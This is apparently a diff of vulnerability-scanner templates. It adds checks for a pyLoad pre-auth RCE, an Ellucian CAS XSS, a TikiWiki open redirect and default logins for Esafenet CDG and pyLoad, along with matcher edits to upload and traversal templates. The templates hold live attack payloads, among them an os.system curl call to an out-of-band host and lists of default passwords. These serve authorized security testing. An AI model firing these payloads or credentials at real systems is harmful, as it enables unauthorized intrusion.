1.23.7
|
|
@ -1 +1 @@
|
||||||
3.2.15
|
3.2.16
|
|
@ -1 +1 @@
|
||||||
3.13.1
|
3.13.2
|
|
@ -1 +1 @@
|
||||||
2.8.0
|
2.9.0
|
|
@ -1 +1 @@
|
||||||
0.9.87
|
0.9.88
|
|
@ -3,7 +3,7 @@ info:
|
||||||
name: Gitlab Login Check Self Hosted
|
name: Gitlab Login Check Self Hosted
|
||||||
author: parthmalhotra,pdresearch
|
author: parthmalhotra,pdresearch
|
||||||
severity: critical
|
severity: critical
|
||||||
description: Checks for a valid login on self hosted Grafana instance.
|
description: Checks for a valid login on self hosted GitLab instance.
|
||||||
reference:
|
reference:
|
||||||
- https://owasp.org/www-community/attacks/Credential_stuffing
|
- https://owasp.org/www-community/attacks/Credential_stuffing
|
||||||
metadata:
|
metadata:
|
||||||
|
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2012-5321
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: TikiWiki CMS Groupware v8.3 - Open Redirect
|
||||||
|
author: ctflearner
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka "frame injection
|
||||||
|
reference:
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2012-5321
|
||||||
|
- https://www.exploit-db.com/exploits/36848
|
||||||
|
- http://st2tea.blogspot.com/2012/02/tiki-wiki-cms-groupware-frame-injection.html
|
||||||
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/73403
|
||||||
|
classification:
|
||||||
|
cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N
|
||||||
|
cvss-score: 5.8
|
||||||
|
cve-id: CVE-2012-5321
|
||||||
|
cwe-id: CWE-20
|
||||||
|
cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
shodan-query: http.html:"tiki wiki"
|
||||||
|
tags: cve,cve2012,redirect,tikiwiki,groupware
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/tiki-featured_link.php?type=f&url=https://interact.sh"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: header
|
||||||
|
regex:
|
||||||
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
|
|
@ -21,7 +21,7 @@ info:
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- | # REQUEST 1
|
- |
|
||||||
POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1
|
POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
|
Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
|
||||||
|
@ -34,8 +34,8 @@ http:
|
||||||
|
|
||||||
-----------------------------154934846911423734231554128137--
|
-----------------------------154934846911423734231554128137--
|
||||||
|
|
||||||
- | # REQUEST 2
|
- |
|
||||||
GET /logos_clients/1.php HTTP/1.1
|
GET /logos_clients/{{randstr}}.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
|
|
|
@ -35,16 +35,15 @@ http:
|
||||||
------WebKitFormBoundaryoZ8meKnrrso89R6Y
|
------WebKitFormBoundaryoZ8meKnrrso89R6Y
|
||||||
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc"
|
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc"
|
||||||
|
|
||||||
test-poc
|
{{randstr}}
|
||||||
------WebKitFormBoundaryoZ8meKnrrso89R6Y--
|
------WebKitFormBoundaryoZ8meKnrrso89R6Y--
|
||||||
|
|
||||||
- method: GET
|
- |
|
||||||
path:
|
GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1
|
||||||
- '{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc'
|
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- 'contains(body, "test-poc") && status_code == 200' # Using CVE-2020-17519 to confirm this.
|
- 'contains(body_2, "{{randstr}}") && status_code == 200' # Using CVE-2020-17519 to confirm this.
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -77,17 +77,15 @@ http:
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
part: body
|
||||||
words:
|
words:
|
||||||
- 'success":true'
|
- 'success":true'
|
||||||
- 'fullname'
|
- 'fullname'
|
||||||
- 'shortname'
|
- 'shortname'
|
||||||
- 'url'
|
- 'url'
|
||||||
condition: and
|
condition: and
|
||||||
part: body
|
|
||||||
|
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
|
@ -64,12 +64,10 @@ http:
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
part: header
|
||||||
words:
|
words:
|
||||||
- application/json
|
- application/json
|
||||||
part: header
|
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -19,7 +19,7 @@ info:
|
||||||
epss-score: 0.96822
|
epss-score: 0.96822
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 2
|
max-request: 2
|
||||||
tags: unauth,cve,fileupload,monitorr,edb,intrusive,packetstorm,cve2020,rce
|
tags: unauth,cve,fileupload,monitor,edb,intrusive,packetstorm,cve2020,rce
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -17,7 +17,7 @@ info:
|
||||||
cwe-id: CWE-434
|
cwe-id: CWE-434
|
||||||
cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:*:*:*
|
cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:*:*:*
|
||||||
epss-score: 0.90859
|
epss-score: 0.90859
|
||||||
tags: cve,cve2020,wordpress,wp-plugin,rce,fileupload,intrusive
|
tags: cve,cve2020,wordpress,wp-plugin,rce
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
max-request: 1
|
||||||
|
|
||||||
|
|
|
@ -41,15 +41,6 @@ http:
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
||||||
- type: word
|
|
||||||
words:
|
|
||||||
- "application/json"
|
|
||||||
part: header
|
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- '{"result":'
|
- '{"result":'
|
||||||
|
@ -57,4 +48,11 @@ http:
|
||||||
- '/tmp/passwd9'
|
- '/tmp/passwd9'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "application/json"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
|
@ -44,15 +44,15 @@ http:
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "File uploaded successfully."
|
- "File uploaded successfully."
|
||||||
|
|
||||||
part: body
|
part: body
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- "len(body) == 28" # length of "\nFile uploaded successfully."
|
- "len(body) == 28" # length of "\nFile uploaded successfully."
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
|
@ -37,7 +37,7 @@ http:
|
||||||
Content-Disposition: form-data; name="file"; filename="poc.txt"
|
Content-Disposition: form-data; name="file"; filename="poc.txt"
|
||||||
Content-Type: image/png
|
Content-Type: image/png
|
||||||
|
|
||||||
POC_TEST
|
{{randstr}}
|
||||||
|
|
||||||
------WebKitFormBoundarySHHbUsfCoxlX1bpS
|
------WebKitFormBoundarySHHbUsfCoxlX1bpS
|
||||||
|
|
||||||
|
@ -47,19 +47,18 @@ http:
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
- type: word
|
- type: word
|
||||||
|
part: body_2
|
||||||
words:
|
words:
|
||||||
- "POC_TEST"
|
- "{{randstr}}"
|
||||||
part: body
|
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
part: header
|
||||||
words:
|
words:
|
||||||
- "text/plain"
|
- "text/plain"
|
||||||
- "ASP.NET"
|
- "ASP.NET"
|
||||||
condition: and
|
condition: and
|
||||||
part: header
|
|
||||||
|
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
|
@ -20,7 +20,7 @@ info:
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 3
|
max-request: 3
|
||||||
verified: true
|
verified: true
|
||||||
tags: cve,cve2021,elfinder,upload,rce,intrusive
|
tags: cve,cve2021,elfinder,fileupload,rce,intrusive
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -28,13 +28,11 @@ http:
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: regex
|
||||||
part: location
|
part: location
|
||||||
words:
|
regex:
|
||||||
- '//interactsh.com/../'
|
- '^\s*//interactsh.com/\.\.'
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 301
|
- 301
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,51 @@
|
||||||
|
id: CVE-2023-0297
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
|
||||||
|
author: MrHarshvardhan,DhiyaneshDk
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/51532
|
||||||
|
- https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-1058
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2023-0297
|
||||||
|
cwe-id: CWE-94
|
||||||
|
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
shodan-query: html:"pyload"
|
||||||
|
tags: huntr,cve,cve2023,rce,pyload,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
cmd: "curl {{interactsh-url}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /flash/addcrypted2 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /flash/addcrypted2 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
jk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body_1
|
||||||
|
words:
|
||||||
|
- 'JDownloader'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- "dns"
|
|
@ -0,0 +1,42 @@
|
||||||
|
id: CVE-2023-2822
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Ellucian Ethos Identity CAS - Cross-Site Scripting
|
||||||
|
author: Guax1
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability was found in Ellucian Ethos Identity up to 5.10.5. It has been classified as problematic. Affected is an unknown function of the file /cas/logout. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely.
|
||||||
|
remediation: Upgrading to version 5.10.6 is able to address this issue. It is recommended to upgrade the affected component.
|
||||||
|
reference:
|
||||||
|
- https://medium.com/@cyberninja717/685bb1675dfb
|
||||||
|
- https://medium.com/@cyberninja717/reflected-cross-site-scripting-vulnerability-in-ellucian-ethos-identity-cas-logout-page-685bb1675dfb
|
||||||
|
- https://vuldb.com/?ctiid.229596
|
||||||
|
- https://vuldb.com/?id.229596
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-2822
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
shodan-query: html:"Ellucian Company"
|
||||||
|
google-query: "login with ellucian ethos identity"
|
||||||
|
tags: cve,cve2023,cas,xss,ellucian
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/cas/logout?url=https://oast.pro"><img%20src=x%20onerror=alert(document.domain)>'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '<img src=x onerror=alert(document.domain)>'
|
||||||
|
- 'Identity Server'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,52 @@
|
||||||
|
id: esafenet-cdg-default-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Esafenet CDG - Default Login
|
||||||
|
author: chesterblue
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
Esafenet electronic document security management system default credentials were discovered.
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
fofa-query: "esafenet"
|
||||||
|
tags: esafenet,cdg,default-login
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/CDGServer3/SystemConfig"
|
||||||
|
headers:
|
||||||
|
content-type: application/x-www-form-urlencoded
|
||||||
|
body: "command=Login&help=null&verifyCodeDigit=dfd&name={{username}}&pass={{password}}"
|
||||||
|
|
||||||
|
attack: clusterbomb
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- "systemadmin"
|
||||||
|
- "configadmin"
|
||||||
|
- "secadmin"
|
||||||
|
- "docadmin"
|
||||||
|
password:
|
||||||
|
- "Est@Spc820"
|
||||||
|
- "12345678"
|
||||||
|
- "123456"
|
||||||
|
- "Est@Spc2018"
|
||||||
|
- "Est@Spc2019"
|
||||||
|
- "Est@Spc2020"
|
||||||
|
- "Est@Spc2021"
|
||||||
|
- "Est@Spc2022"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "est.connection.url"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "(127\\.0\\.0\\.1)|(localhost)(192\\.168|10\\.|172\\.(1[6-9]|2\\d|3[01]))\\.\\d{1,3}\\.\\d{1,3}"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,44 @@
|
||||||
|
id: pyload-default-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: PyLoad Default Login
|
||||||
|
author: DhiyaneshDk
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
PyLoad Default Credentials were discovered.
|
||||||
|
reference:
|
||||||
|
- https://pypi.org/project/pyload-ng/#:~:text=Default%20username%3A%20pyload%20.,Default%20password%3A%20pyload%20.
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
shodan-query: html:"pyload"
|
||||||
|
tags: default-login,pyload
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
do=login&username={{username}}&password={{password}}&submit=Login
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- pyload
|
||||||
|
password:
|
||||||
|
- pyload
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- 'Set-Cookie: pyload_session='
|
||||||
|
- '/dashboard'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 302
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: hookbot-rat
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Hookbot Rat Panel - Detect
|
||||||
|
author: pussycat0x
|
||||||
|
severity: info
|
||||||
|
description: |
|
||||||
|
Hookbot panel were detected.
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: title:"hookbot"
|
||||||
|
tags: tech,rat,hookbot,c2,panel,detect
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "status_code == 200 && contains(body, 'HOOKBOT PANEL')"
|
|
@ -0,0 +1,36 @@
|
||||||
|
id: pyload-panel
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: PyLoad Login - Panel
|
||||||
|
author: DhiyaneshDk
|
||||||
|
severity: info
|
||||||
|
description: |
|
||||||
|
A Pyload Login was detected.
|
||||||
|
reference:
|
||||||
|
- https://github.com/pyload/pyload
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
shodan-query: title:"Login - pyLoad"
|
||||||
|
verified: true
|
||||||
|
tags: panel,pyload,login
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
- "{{BaseURL}}/login"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
host-redirects: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'Login - pyLoad'
|
||||||
|
- 'alt="Pyload'
|
||||||
|
condition: or
|
||||||
|
case-insensitive: true
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue